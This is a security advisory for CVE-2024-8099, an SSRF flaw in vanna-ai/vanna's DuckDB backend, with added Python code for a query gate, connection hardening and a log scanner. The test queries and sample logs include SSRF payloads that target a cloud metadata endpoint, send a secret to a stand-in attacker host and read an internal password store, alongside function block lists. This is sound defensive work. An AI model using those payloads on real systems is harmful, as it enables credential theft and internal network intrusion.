CVE-2024-8099
📋 TL;DR
When vanna-ai/vanna is backed by DuckDB, an attacker who can get a crafted SQL query executed can abuse DuckDB's file-reading functions (read_csv, read_text, read_blob) with a URL argument, so that the DuckDB process itself makes requests to internal or external systems (SSRF). This can lead to data exfiltration, internal network reconnaissance, and further exploitation of any service the database host can reach. All users running vanna-ai/vanna with DuckDB are affected.
💻 Affected Systems
- vanna-ai/vanna
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of internal systems through SSRF chaining, sensitive data exfiltration from internal services, and potential lateral movement within the network.
Likely Case
Unauthorized access to internal HTTP services, metadata services (like AWS/Azure instance metadata), and data exfiltration from accessible internal endpoints.
If Mitigated
Limited impact due to network segmentation, egress filtering, and proper input validation preventing successful exploitation.
🎯 Exploit Status
Exploitation requires the ability to get a SQL query executed by the application's DuckDB connection. The payload is a plain SQL query that calls one of DuckDB's built-in file-reading functions with a URL, so no memory corruption or special tooling is needed; the request is issued by the database process, not by the attacker's client, which is what makes internal endpoints reachable.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific version
Vendor Advisory: https://huntr.com/bounties/19b96694-ed52-4ee4-8d2c-6cc7bd09c0ad
Restart Required: No
Instructions:
1. Update vanna-ai/vanna to the latest patched version.
2. Verify that the DuckDB connection is configured to refuse external file and network access (SET enable_external_access = false;) rather than relying on the application patch alone.
3. Test SQL query functionality after the update, including that queries using read_csv, read_text or read_blob with a URL now fail.
🔧 Temporary Workarounds
Restrict DuckDB file functions
Configure DuckDB to block external file and network access. This covers read_csv, read_text and read_blob as well as the other readers (read_parquet, read_json), COPY and ATTACH. Apply the setting when the connection is opened, and lock the configuration afterwards (lock_configuration) so a query cannot switch it back on:
SET enable_external_access = false;
Input validation and sanitization
Implement strict input validation to reject SQL queries that call file-reading functions or contain URL string literals (DuckDB also reads a URL given directly in place of a table name). Check the query case-insensitively and after comments are stripped, since a blocklist on the raw text is easy to evade.
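The gate and the connection hardening described above, as an added example in Python (not vanna-ai/vanna's own code or its fix). The DuckDB settings it applies are real DuckDB configuration options; the list of blocked functions, the statement keywords, and the assumption that the application can run statements on the connection before it serves user queries are this example's own choices.

```python
"""Pre-execution gate for SQL bound for a DuckDB connection.

Added example, not vanna-ai/vanna's own code or its fix. The DuckDB settings
below are real configuration options; which functions to block, and the
assumption that the application can run statements on the connection before
it serves user queries, are this example's own.
"""
import re
from typing import List, Tuple

# DuckDB table functions that read from a path or URL (real DuckDB functions;
# treating all of them as forbidden is this example's policy).
FILE_FUNCTIONS = (
    "read_csv", "read_csv_auto", "read_text", "read_blob",
    "read_parquet", "parquet_scan", "read_json", "read_json_auto", "read_json_objects",
)

# Strings and comments in one left-to-right pass, so a quote inside a comment
# or a '--' inside a literal cannot desynchronise the scan.
_TOKEN_RE = re.compile(r"'(?:[^']|'')*'|--[^\n]*|/\*.*?\*/", re.DOTALL)
_FUNC_RE = re.compile(r"\b(" + "|".join(FILE_FUNCTIONS) + r")\s*\(", re.IGNORECASE)
# Statements that touch the filesystem or network, or load extensions such as
# httpfs; matched only as the leading keyword of a statement.
_STMT_RE = re.compile(
    r"\s*(COPY|ATTACH|INSTALL|LOAD|EXPORT\s+DATABASE|IMPORT\s+DATABASE)\b", re.IGNORECASE)
_URL_RE = re.compile(r"^[a-z][a-z0-9+.-]*://", re.IGNORECASE)


def strip_literals(sql: str) -> Tuple[str, List[str]]:
    """Return (sql with literals blanked and comments removed, list of literal bodies)."""
    literals: List[str] = []

    def repl(m):
        tok = m.group(0)
        if tok.startswith("'"):
            literals.append(tok[1:-1])
            return "''"
        return " "

    return _TOKEN_RE.sub(repl, sql), literals


def find_violations(sql: str) -> List[str]:
    """List every reason the query must not reach DuckDB; empty means allowed."""
    code, literals = strip_literals(sql)
    reasons: List[str] = []
    # 1. Any literal that is a URL. This also catches DuckDB's replacement scan,
    #    SELECT * FROM 'https://host/x.csv', which needs no function call at all.
    reasons += ["url:" + lit for lit in literals if _URL_RE.match(lit)]
    # 2. File-reading table functions anywhere in the code (case-insensitive,
    #    whitespace before the parenthesis allowed, literals already blanked).
    reasons += ["func:" + m.group(1).lower() for m in _FUNC_RE.finditer(code)]
    # 3. Statements that reach outside the database, checked per statement so a
    #    column named "load" in the middle of a SELECT is not a false positive.
    for stmt in code.split(";"):
        m = _STMT_RE.match(stmt)
        if m:
            reasons.append("stmt:" + re.sub(r"\s+", " ", m.group(1).upper()))
    return reasons


def is_allowed(sql: str) -> bool:
    return not find_violations(sql)


# Server-side control, applied once when the connection is opened. The gate
# above is defence in depth; this is what actually stops DuckDB from fetching.
HARDENING = (
    "SET enable_external_access = false;",     # no external files, URLs, COPY, ATTACH
    "SET autoinstall_known_extensions = false;",
    "SET autoload_known_extensions = false;",  # httpfs cannot be pulled in implicitly
    "SET lock_configuration = true;",          # must be last: freezes the settings above
)


def harden_connection(conn) -> List[str]:
    """Apply HARDENING to any object with execute(sql), e.g. a duckdb connection."""
    for stmt in HARDENING:
        conn.execute(stmt)
    return list(HARDENING)


if __name__ == "__main__":
    for q in (  # constructed queries
        "SELECT * FROM read_csv('http://169.254.169.254/latest/meta-data/')",
        "SELECT * FROM 'https://attacker.example/data.csv'",
        "SELECT 'read_csv' AS note FROM orders",
    ):
        print(is_allowed(q), find_violations(q), q)
```

Run the gate on every query before it reaches the connection and log the reasons it returns; if the application legitimately needs to load its own local files, do that before `harden_connection` runs, because `enable_external_access = false` blocks those reads too once the configuration is locked.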
🧯 If You Can't Patch
- Implement network segmentation to restrict outbound connections from the vulnerable system
- Deploy web application firewall (WAF) rules to detect and block SSRF patterns in SQL queries
🔍 How to Verify
Check if Vulnerable:
Test if SQL queries containing DuckDB file reading functions (read_csv, read_text, read_blob) with URLs are executed successfully
Check Version:
Check vanna-ai/vanna version and verify it's patched per vendor advisory
Verify Fix Applied:
Attempt to execute SSRF payloads using DuckDB file functions and verify they are blocked or fail
📡 Detection & Monitoring
Log Indicators:
- SQL queries containing read_csv, read_csv_auto, read_text, read_blob, read_parquet or read_json with URL patterns, or a URL string literal used directly as a table source
- Outbound HTTP requests from database process to unusual destinations
Network Indicators:
- Database process making HTTP requests to internal or external endpoints
- Unusual outbound traffic patterns from database server
SIEM Query:
source="vanna_logs" AND ("read_csv" OR "read_csv_auto" OR "read_text" OR "read_blob" OR "read_parquet" OR "read_json") AND ("http://" OR "https://" OR "s3://" OR "file://")
Requiring a function name misses DuckDB's replacement scan (a bare URL used as a table source); if query volume allows, alert on the URL patterns alone and use the function name to raise priority.
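The log indicators and the SIEM query above, implemented as an added Python scanner (not part of the advisory or of vanna-ai/vanna). The log format and the log lines are constructed for the example; the reader functions beyond the three the advisory names are real DuckDB functions with the same capability, and the cloud metadata host list and severity tiers are this example's own choices. It goes a step beyond the SIEM query by classifying the request target (cloud metadata endpoint, private address, external name) so an analyst can see which hits are reconnaissance against internal systems and which are likely exfiltration.

```python
"""Scan application logs for DuckDB SSRF indicators.

Added example, not part of the advisory or of vanna-ai/vanna. The log format
and the log lines are constructed; the reader functions beyond the three the
advisory names are real DuckDB functions with the same capability.
"""
import ipaddress
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Constructed sample lines in a made-up "<ts> <level> run_sql: <sql>" format.
LOG_LINES = [
    "2024-08-27T10:15:02Z INFO run_sql: SELECT customer, total FROM orders WHERE total > 100",
    "2024-08-27T10:15:09Z INFO run_sql: SELECT * FROM read_csv('http://169.254.169.254/latest/meta-data/iam/security-credentials/')",
    "2024-08-27T10:15:31Z INFO run_sql: select content from READ_TEXT('https://attacker.example/collect?d=secret')",
    "2024-08-27T10:16:04Z INFO run_sql: SELECT * FROM read_blob('http://10.0.3.7:8500/v1/kv/app/db_password')",
    "2024-08-27T10:16:40Z INFO run_sql: SELECT * FROM 'https://cdn.example/public/rates.csv'",
    "2024-08-27T10:17:12Z INFO run_sql: SELECT 'read_csv' AS howto FROM docs",
]

_LINE_RE = re.compile(r"^(?P<ts>\S+)\s+\S+\s+run_sql:\s*(?P<sql>.*)$")
_FUNC_RE = re.compile(
    r"\b(read_csv(?:_auto)?|read_text|read_blob|read_parquet|read_json(?:_auto)?)\s*\(", re.I)
# URL inside a SQL string literal; schemes DuckDB reads through httpfs, plus file://.
_URL_RE = re.compile(r"'((?:https?|s3|gcs|file)://[^']*)'", re.I)
# Well-known cloud metadata endpoints (AWS/Azure/OpenStack/GCP by IP, GCP by name).
METADATA_HOSTS = {"169.254.169.254", "metadata.google.internal"}


def classify_target(scheme: str, host: Optional[str]) -> str:
    if scheme.lower() == "file":
        return "local-file"
    if not host:
        return "unknown"
    h = host.lower()
    if h in METADATA_HOSTS:          # checked before the IP test: 169.254/16 is link-local
        return "cloud-metadata"
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        # A DNS name: still a signal, because it can resolve to an internal address.
        return "external-name"
    if ip.is_loopback or ip.is_private or ip.is_link_local:
        return "internal"
    return "external"


def severity(target: str, functions: List[str]) -> str:
    if target in ("cloud-metadata", "internal", "local-file"):
        return "high"      # reconnaissance or credential theft against internal systems
    if functions:
        return "medium"    # outbound fetch to an outside host; data may be exfiltrated in the URL
    return "low"           # URL read via replacement scan with no explicit reader call: review


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """One alert per URL literal found in a run_sql log line."""
    alerts: List[Dict[str, object]] = []
    for line in lines:
        m = _LINE_RE.match(line)
        if not m:
            continue
        sql = m.group("sql")
        functions = sorted({f.lower() for f in _FUNC_RE.findall(sql)})
        for url in _URL_RE.findall(sql):
            parts = urlsplit(url)
            target = classify_target(parts.scheme, parts.hostname)
            alerts.append({
                "ts": m.group("ts"),
                "functions": functions,
                "url": url,
                "host": parts.hostname,
                "target": target,
                "severity": severity(target, functions),
            })
    return alerts


if __name__ == "__main__":
    for a in scan(LOG_LINES):
        print(a["severity"].upper(), a["ts"], a["target"], a["url"])
```

Correlate the "host" field of each alert with the network indicators above: an outbound connection from the database process to the same address within seconds of the log line confirms the request was actually made rather than rejected by the query gate or by DuckDB's configuration.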